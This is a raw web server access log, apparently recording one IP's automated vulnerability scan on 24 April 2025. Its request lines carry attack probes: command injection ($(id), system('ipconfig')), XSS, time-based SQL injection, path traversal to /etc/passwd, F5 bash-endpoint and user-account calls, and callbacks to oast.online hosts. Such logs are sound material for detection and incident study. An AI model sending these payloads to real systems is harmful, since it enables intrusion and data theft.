0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:10:32:50 -0400] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:55 -0400] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:55 -0400] "GET /api/server/version HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:32:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:33:01 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:33:24 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:34 -0400] "POST /models?url=http%3a//d04qr7ij4pq19d75k490zpxuhotqcwarp.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:37 -0400] "POST /geoserver/wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:37 -0400] "POST /wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - 
[24/Apr/2025:10:33:45 -0400] "GET /hoteldruid/inizio.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:54 -0400] "POST /api/sys/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:35:49 -0400] "POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:02 -0400] "POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:41 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:36:45 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:10:36:49 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20" 154.84.62.234 - - [24/Apr/2025:10:36:54 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:36:54 -0400] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:57 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:37:22 -0400] "POST /app/sys1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:37:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:37:39 -0400] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:38:10 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:38:30 -0400] "POST /api/jsonrpc HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:38:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:39:00 -0400] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Whale/3.26.244.21 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:39:05 -0400] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d04qr7ij4pq19d75k490wt1xi6tuh68f7.oast.online/patrowl.svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) 
Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:40:00 -0400] "GET /chaosblade?cmd=$(id) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/22.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:40:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:10:40:24 -0400] "POST /modules/ndk_steppingpack/search-result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:28 -0400] "POST /modules/ndk_steppingpack/search-result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:30 -0400] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:10:40:34 -0400] "GET /api/v1/cav/client/status/../../admin/options HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:34 -0400] "GET /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:40:43 -0400] "GET /user/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - 
[24/Apr/2025:10:41:01 -0400] "GET /user/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.20" 154.84.62.234 - - [24/Apr/2025:10:41:02 -0400] "GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:10:41:06 -0400] "POST /arrow.flight.protocol.FlightService/DoPut HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:10:41:24 -0400] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:41:29 -0400] "POST /cgi-bin/quick/lgqOUL HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:10:42:26 -0400] "GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:42:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:43:15 -0400] "POST /userentry?accountId=/../../../tomcat/webapps/mcRLW/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:10:43:17 -0400] 
"POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.52" 154.84.62.234 - - [24/Apr/2025:10:43:27 -0400] "GET /mcRLW/CVE-2023-47246.txt?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:43:43 -0400] "GET /index.php?user/login HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:44:05 -0400] "GET /uploads/include/dialog/select_media_post_wangEditor.php?filename=1%3Cinput%20onfocus=eval(atob(this.id))%20id=YWxlcnQoZG9jdW1lbnQuY29va2llKTs=%20autofocus%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - KLQOy [24/Apr/2025:10:44:27 -0400] "PATCH /mgmt/tm/auth/user/KLQOy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:44:33 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:44:37 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - KLQOy [24/Apr/2025:10:44:41 -0400] "PATCH /mgmt/tm/auth/user/KLQOy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:44:44 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:44:47 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; 
rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:44:49 -0400] "POST /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:44:52 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0" 154.84.62.234 - - [24/Apr/2025:10:44:54 -0400] "GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:45:32 -0400] "GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:10:45:46 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1" 154.84.62.234 - - [24/Apr/2025:10:45:58 -0400] "GET /dview8/api/usersByLevel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:10:46:21 -0400] "GET /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:46:28 -0400] "GET /api/cors/http:%2f%2fnextchat.d04qr7ij4pq19d75k490coykfea8mbrty.oast.online%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:46:47 -0400] "POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:47:17 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:47:54 -0400] "GET /backend/backend/auth/signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:47:58 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:47:58 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.51" 154.84.62.234 - - [24/Apr/2025:10:49:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:33 -0400] "GET / HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:44 -0400] "POST /api/authentication/login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:49:54 -0400] "GET /signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:10:49:58 -0400] "GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:50:24 -0400] "POST /Citrix/teststoreAuth/SamlTest HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:50:29 -0400] "GET /api/clusters HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" 154.84.62.234 - - [24/Apr/2025:10:51:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:51:46 -0400] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:52:02 -0400] "GET /nodes?view=summary HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:52:28 -0400] "GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 
(Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:52:35 -0400] "POST /3/ParseSetup HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.18" 154.84.62.234 - - [24/Apr/2025:10:53:01 -0400] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:53:07 -0400] "GET /tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET 
/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET 
/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:10:54:00 -0400] "GET /api/login/unlockGetData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:06 -0400] "POST /api/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:16 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:22 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:10:54:27 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:35 -0400] "GET /model-versions/get-artifact?path=random&name=FPiMWX&version=2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:10:54:47 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) 